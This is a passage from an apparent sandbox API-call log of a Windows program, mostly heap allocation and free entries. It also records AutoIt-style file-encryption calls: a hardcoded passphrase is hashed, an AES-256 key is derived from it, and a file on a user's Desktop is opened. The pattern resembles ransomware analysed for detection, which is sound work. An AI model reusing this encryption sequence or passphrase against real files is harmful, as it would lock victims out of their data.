hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.590] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.591] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.597] CloseHandle (hObject=0x258) returned 1 [0122.597] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.597] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e657550, ftCreationTime.dwHighDateTime=0x1d5e6c4, ftLastAccessTime.dwLowDateTime=0x4dbb1970, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x4dbb1970, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x8f2b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="cSg8 emhaX_r.ots", cAlternateFileName="CSG8EM~1.OTS")) returned 0x41ac600 [0122.597] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0122.598] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.598] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.599] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.599] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.600] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.600] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.600] CryptHashData (hHash=0x41ac140, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.600] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.601] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0122.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.601] CryptDestroyHash (hHash=0x41ac140) returned 1 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0122.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.602] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.602] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.602] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\csg8 emhax_r.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.603] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.603] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.604] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.604] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0122.604] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.605] RtlAllocateHeap 